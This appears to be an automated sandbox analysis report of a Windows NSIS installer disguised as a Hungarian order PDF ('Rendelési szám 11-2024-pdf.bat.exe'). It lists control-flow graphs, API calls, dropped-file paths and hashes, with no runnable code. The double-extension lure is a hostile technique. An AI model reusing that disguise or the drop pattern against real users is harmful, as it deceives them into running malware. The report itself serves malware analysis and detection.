                                              control_flow_graph 563 40176f-401794 call 402c41 call 405bd0 568 401796-40179c call 406284 563->568 569 40179e-4017b0 call 406284 call 405b59 lstrcatW 563->569 574 4017b5-4017b6 call 406518 568->574 569->574 578 4017bb-4017bf 574->578 579 4017c1-4017cb call 4065c7 578->579 580 4017f2-4017f5 578->580 587 4017dd-4017ef 579->587 588 4017cd-4017db CompareFileTime 579->588 581 4017f7-4017f8 call 405d55 580->581 582 4017fd-401819 call 405d7a 580->582 581->582 590 40181b-40181e 582->590 591 40188d-4018b6 call 4052ec call 403116 582->591 587->580 588->587 592 401820-40185e call 406284 * 2 call 4062a6 call 406284 call 4058ea 590->592 593 40186f-401879 call 4052ec 590->593 603 4018b8-4018bc 591->603 604 4018be-4018ca SetFileTime 591->604 592->578 626 401864-401865 592->626 605 401882-401888 593->605 603->604 607 4018d0-4018db CloseHandle 603->607 604->607 608 402ace 605->608 610 4018e1-4018e4 607->610 611 402ac5-402ac8 607->611 612 402ad0-402ad4 608->612 615 4018e6-4018f7 call 4062a6 lstrcatW 610->615 616 4018f9-4018fc call 4062a6 610->616 611->608 622 401901-4022fc call 4058ea 615->622 616->622 622->612 626->605 628 401867-401868 626->628 628->593
                                              APIs
                                              • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Synthesizations,?,?,00000031), ref: 004017B0
                                              • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Synthesizations,?,?,00000031), ref: 004017D5
                                                • Part of subcall function 00406284: lstrcpynW.KERNEL32(?,?,00000400,0040342A,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406291
                                                • Part of subcall function 004052EC: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nso4347.tmp\System.dll,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000,?), ref: 00405324
                                                • Part of subcall function 004052EC: lstrlenW.KERNEL32(0040324F,Skipped: C:\Users\user\AppData\Local\Temp\nso4347.tmp\System.dll,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000), ref: 00405334
                                                • Part of subcall function 004052EC: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nso4347.tmp\System.dll,0040324F,0040324F,Skipped: C:\Users\user\AppData\Local\Temp\nso4347.tmp\System.dll,00000000,00410EA0,004030B0), ref: 00405347
                                                • Part of subcall function 004052EC: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nso4347.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nso4347.tmp\System.dll), ref: 00405359
                                                • Part of subcall function 004052EC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040537F
                                                • Part of subcall function 004052EC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405399
                                                • Part of subcall function 004052EC: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                              • String ID: C:\Users\user\AppData\Local\Temp\nso4347.tmp$C:\Users\user\AppData\Local\Temp\nso4347.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Synthesizations$Call
                                              • API String ID: 1941528284-211426771
                                              • Opcode ID: b281b56859217cd12faca26e4537830f2bf9983139c1f988b18464fa74c6c1d9
                                              • Instruction ID: 128eea75dfaaf3eda36781b62dd3037428c7b97943fe82b2985fb16c69cf4114
                                              • Opcode Fuzzy Hash: b281b56859217cd12faca26e4537830f2bf9983139c1f988b18464fa74c6c1d9
                                              • Instruction Fuzzy Hash: C541A031900519BFCF10BBA5CD46EAE3679EF45328B20427FF412B10E1CA3C8A519A6E
                                              Function 004052EC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 629 4052ec-405301 630 405307-405318 629->630 631 4053b8-4053bc 629->631 632 405323-40532f lstrlenW 630->632 633 40531a-40531e call 4062a6 630->633 635 405331-405341 lstrlenW 632->635 636 40534c-405350 632->636 633->632 635->631 637 405343-405347 lstrcatW 635->637 638 405352-405359 SetWindowTextW 636->638 639 40535f-405363 636->639 637->636 638->639 640 405365-4053a7 SendMessageW * 3 639->640 641 4053a9-4053ab 639->641 640->641 641->631 642 4053ad-4053b0 641->642 642->631
                                              APIs
                                              • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nso4347.tmp\System.dll,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000,?), ref: 00405324
                                              • lstrlenW.KERNEL32(0040324F,Skipped: C:\Users\user\AppData\Local\Temp\nso4347.tmp\System.dll,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000), ref: 00405334
                                              • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nso4347.tmp\System.dll,0040324F,0040324F,Skipped: C:\Users\user\AppData\Local\Temp\nso4347.tmp\System.dll,00000000,00410EA0,004030B0), ref: 00405347
                                              • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nso4347.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nso4347.tmp\System.dll), ref: 00405359
                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040537F
                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405399
                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                              • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nso4347.tmp\System.dll
                                              • API String ID: 2531174081-3600939748
                                              • Opcode ID: f62b684c0e6f289dd6bb465d0f12a75b041ce70bd46b314235ddfc122f96f8a0
                                              • Instruction ID: 5cbdc996bc9841dedcc8c590482a37e7ed43af3164ff52369f5afd8429117419
                                              • Opcode Fuzzy Hash: f62b684c0e6f289dd6bb465d0f12a75b041ce70bd46b314235ddfc122f96f8a0
                                              • Instruction Fuzzy Hash: FA219D71900618BBDB11AF96DD849CFBF78EF45354F50807AF904B62A0C3B94A50CFA8
                                              Function 0040264A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 643 40264a-402663 call 402c1f 646 402ac5-402ac8 643->646 647 402669-402670 643->647 648 402ace-402ad4 646->648 649 402672 647->649 650 402675-402678 647->650 649->650 652 4027dc-4027e4 650->652 653 40267e-40268d call 4061e4 650->653 652->646 653->652 656 402693 653->656 657 402699-40269d 656->657 658 402732-402735 657->658 659 4026a3-4026be ReadFile 657->659 661 402737-40273a 658->661 662 40274d-40275d call 405dfd 658->662 659->652 660 4026c4-4026c9 659->660 660->652 664 4026cf-4026dd 660->664 661->662 665 40273c-402747 call 405e5b 661->665 662->652 671 40275f 662->671 667 4026e3-4026f5 MultiByteToWideChar 664->667 668 402798-4027a4 call 4061cb 664->668 665->652 665->662 667->671 672 4026f7-4026fa 667->672 668->648 674 402762-402765 671->674 675 4026fc-402707 672->675 674->668 677 402767-40276c 674->677 675->674 678 402709-40272e SetFilePointer MultiByteToWideChar 675->678 679 4027a9-4027ad 677->679 680 40276e-402773 677->680 678->675 681 402730 678->681 683 4027ca-4027d6 SetFilePointer 679->683 684 4027af-4027b3 679->684 680->679 682 402775-402788 680->682 681->671 682->652 687 40278a-402790 682->687 683->652 685 4027b5-4027b9 684->685 686 4027bb-4027c8 684->686 685->683 685->686 686->652 687->657 688 402796 687->688 688->652
                                              APIs
                                              • ReadFile.KERNELBASE(?,?,?,?), ref: 004026B6
                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
                                              • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A
                                                • Part of subcall function 00405E5B: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405E71
                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: File$Pointer$ByteCharMultiWide$Read
                                              • String ID: 9
                                              • API String ID: 163830602-2366072709
                                              • Opcode ID: c1a2398a3cf68ffccba9bba39206efc2048042628f08e4a72376123c44d13fd0
                                              • Instruction ID: 3d8386ac743f87b5a59d0c6af2c48158715b6bf8f4fdb2ba716f86882e7a1e00
                                              • Opcode Fuzzy Hash: c1a2398a3cf68ffccba9bba39206efc2048042628f08e4a72376123c44d13fd0
                                              • Instruction Fuzzy Hash: 46510A74D10219AEDF219F95DA88AAEB779FF04304F50443BE901F72D1D7B49982CB58
                                              Function 004065EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 689 4065ee-40660e GetSystemDirectoryW 690 406610 689->690 691 406612-406614 689->691 690->691 692 406625-406627 691->692 693 406616-40661f 691->693 695 406628-40665b wsprintfW LoadLibraryExW 692->695 693->692 694 406621-406623 693->694 694->695
                                              APIs
                                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406605
                                              • wsprintfW.USER32 ref: 00406640
                                              • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406654
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                              • String ID: %s%S.dll$UXTHEME$\
                                              • API String ID: 2200240437-1946221925
                                              • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                              • Instruction ID: 0a3accc906e0554885a7c349f3439cc1632e9825758041c21a8046ddc9b1cf8d
                                              • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                              • Instruction Fuzzy Hash: 28F0217050111967CB10EB64DD0DFAB3B6CA700304F10487AA547F10D1EBBDDB64CB98
                                              Function 00403116 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 696 403116-40312d 697 403136-40313e 696->697 698 40312f 696->698 699 403140 697->699 700 403145-40314a 697->700 698->697 699->700 701 40315a-403167 call 4032fb 700->701 702 40314c-403155 call 403311 700->702 706 4032b2 701->706 707 40316d-403171 701->707 702->701 710 4032b4-4032b5 706->710 708 403177-403197 GetTickCount call 4067bf 707->708 709 40329b-40329d 707->709 720 4032f1 708->720 722 40319d-4031a5 708->722 711 4032e6-4032ea 709->711 712 40329f-4032a2 709->712 714 4032f4-4032f8 710->714 715 4032b7-4032bd 711->715 716 4032ec 711->716 717 4032a4 712->717 718 4032a7-4032b0 call 4032fb 712->718 723 4032c2-4032d0 call 4032fb 715->723 724 4032bf 715->724 716->720 717->718 718->706 729 4032ee 718->729 720->714 726 4031a7 722->726 727 4031aa-4031b8 call 4032fb 722->727 723->706 733 4032d2-4032de call 405e2c 723->733 724->723 726->727 727->706 734 4031be-4031c7 727->734 729->720 739 4032e0-4032e3 733->739 740 403297-403299 733->740 736 4031cd-4031ea call 4067df 734->736 742 4031f0-403207 GetTickCount 736->742 743 403293-403295 736->743 739->711 740->710 744 403252-403254 742->744 745 403209-403211 742->745 743->710 746 403256-40325a 744->746 747 403287-40328b 744->747 748 403213-403217 745->748 749 403219-40324a MulDiv wsprintfW call 4052ec 745->749 751 40325c-403261 call 405e2c 746->751 752 40326f-403275 746->752 747->722 753 403291 747->753 748->744 748->749 754 40324f 749->754 757 403266-403268 751->757 756 40327b-40327f 752->756 753->720 754->744 756->736 758 403285 756->758 757->740 759 40326a-40326d 757->759 758->720 759->756
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: CountTick$wsprintf
                                              • String ID: ... %d%%
                                              • API String ID: 551687249-2449383134
                                              • Opcode ID: 557a710098fc5fea4fad4b99a5744db3c4a6bc79f6805394010e30fec0e2fa40
                                              • Instruction ID: eb9965c025c0ad248c1811abffb3300191da1be904cace2ded6344ef59bce26d
                                              • Opcode Fuzzy Hash: 557a710098fc5fea4fad4b99a5744db3c4a6bc79f6805394010e30fec0e2fa40
                                              • Instruction Fuzzy Hash: 97516B71900219EBCB10DF65EA44A9F3BA8AF44766F1441BFFC04B72C1C7789E518BA9
                                              Function 004057BB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 760 4057bb-405806 CreateDirectoryW 761 405808-40580a 760->761 762 40580c-405819 GetLastError 760->762 763 405833-405835 761->763 762->763 764 40581b-40582f SetFileSecurityW 762->764 764->761 765 405831 GetLastError 764->765 765->763
                                              APIs
                                              • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057FE
                                              • GetLastError.KERNEL32 ref: 00405812
                                              • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405827
                                              • GetLastError.KERNEL32 ref: 00405831
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                                              • String ID: C:\Users\user\Desktop
                                              • API String ID: 3449924974-224404859
                                              • Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                              • Instruction ID: bfe53add753044f5513d0e7cef191a671c10544bda2f5855e72e4bfb682ac43c
                                              • Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                              • Instruction Fuzzy Hash: 14011A72D00619DADF009FA4C9447EFBBB4EF14355F00843AD945B6281DB789658CFE9
                                              Function 00405DA9 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 766 405da9-405db5 767 405db6-405dea GetTickCount GetTempFileNameW 766->767 768 405df9-405dfb 767->768 769 405dec-405dee 767->769 771 405df3-405df6 768->771 769->767 770 405df0 769->770 770->771
                                              APIs
                                              • GetTickCount.KERNEL32 ref: 00405DC7
                                              • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe",00403357,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004035A3), ref: 00405DE2
                                              Strings
                                              • nsa, xrefs: 00405DB6
                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405DAE, 00405DB2
                                              • "C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe", xrefs: 00405DA9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: CountFileNameTempTick
                                              • String ID: "C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                              • API String ID: 1716503409-647400429
                                              • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                              • Instruction ID: 8d675393d4be3a1a13ee7cec111603dd999094634a9ab4ae6aafa5463bef85a0
                                              • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                              • Instruction Fuzzy Hash: 9BF03076A00304FBEB00DF69DD09E9BB7A9EF95710F11803BE900E7250E6B09954DB64
                                              Function 6FBC177B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 772 6fbc177b-6fbc17ba call 6fbc1b63 776 6fbc18da-6fbc18dc 772->776 777 6fbc17c0-6fbc17c4 772->777 778 6fbc17cd-6fbc17da call 6fbc2398 777->778 779 6fbc17c6-6fbc17cc call 6fbc2356 777->779 784 6fbc17dc-6fbc17e1 778->784 785 6fbc180a-6fbc1811 778->785 779->778 786 6fbc17fc-6fbc17ff 784->786 787 6fbc17e3-6fbc17e4 784->787 788 6fbc1831-6fbc1835 785->788 789 6fbc1813-6fbc182f call 6fbc256d call 6fbc15b4 call 6fbc1272 GlobalFree 785->789 786->785 795 6fbc1801-6fbc1802 call 6fbc2d2f 786->795 791 6fbc17ec-6fbc17ed call 6fbc2a74 787->791 792 6fbc17e6-6fbc17e7 787->792 793 6fbc1837-6fbc1880 call 6fbc15c6 call 6fbc256d 788->793 794 6fbc1882-6fbc1888 call 6fbc256d 788->794 813 6fbc1889-6fbc188d 789->813 804 6fbc17f2 791->804 797 6fbc17e9-6fbc17ea 792->797 798 6fbc17f4-6fbc17fa call 6fbc2728 792->798 793->813 794->813 807 6fbc1807 795->807 797->785 797->791 812 6fbc1809 798->812 804->807 807->812 812->785 814 6fbc188f-6fbc189d call 6fbc2530 813->814 815 6fbc18ca-6fbc18d1 813->815 822 6fbc189f-6fbc18a2 814->822 823 6fbc18b5-6fbc18bc 814->823 815->776 820 6fbc18d3-6fbc18d4 GlobalFree 815->820 820->776 822->823 824 6fbc18a4-6fbc18ac 822->824 823->815 825 6fbc18be-6fbc18c9 call 6fbc153d 823->825 824->823 826 6fbc18ae-6fbc18af FreeLibrary 824->826 825->815 826->823
                                              APIs
                                                • Part of subcall function 6FBC1B63: GlobalFree.KERNEL32(?), ref: 6FBC1DB6
                                                • Part of subcall function 6FBC1B63: GlobalFree.KERNEL32(?), ref: 6FBC1DBB
                                                • Part of subcall function 6FBC1B63: GlobalFree.KERNEL32(?), ref: 6FBC1DC0
                                              • GlobalFree.KERNEL32(00000000), ref: 6FBC1829
                                              • FreeLibrary.KERNEL32(?), ref: 6FBC18AF
                                              • GlobalFree.KERNEL32(00000000), ref: 6FBC18D4
                                                • Part of subcall function 6FBC2356: GlobalAlloc.KERNEL32(00000040,?), ref: 6FBC2387
                                                • Part of subcall function 6FBC2728: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6FBC17FA,00000000), ref: 6FBC27F8
                                                • Part of subcall function 6FBC15C6: lstrcpyW.KERNEL32(?,6FBC4020,00000000,6FBC15C3,?,00000000,6FBC1753,00000000), ref: 6FBC15DC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2603763082.000000006FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FBC0000, based on PE: true
                                              • Associated: 00000000.00000002.2603737645.000000006FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.2603777952.000000006FBC3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.2603791388.000000006FBC5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6fbc0000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: Global$Free$Alloc$Librarylstrcpy
                                              • String ID:
                                              • API String ID: 1791698881-3916222277
                                              • Opcode ID: cef7c2a43fa771a68df89bcdfb243a7c62a758466f60e9659b88957345a796f0
                                              • Instruction ID: 22edcd096741470c1e1c1fb4e84c08ae4941c0f339454de7048aa3e0c512ae20
                                              • Opcode Fuzzy Hash: cef7c2a43fa771a68df89bcdfb243a7c62a758466f60e9659b88957345a796f0
                                              • Instruction Fuzzy Hash: 3541B0714043C5DADF009F34F884BCB37A8FF05315F085566E95ABA1C6DBB89185CB62
                                              Function 004023E4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nso4347.tmp,00000023,00000011,00000002), ref: 0040242F
                                              • RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nso4347.tmp,00000000,00000011,00000002), ref: 0040246F
                                              • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nso4347.tmp,00000000,00000011,00000002), ref: 00402557
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
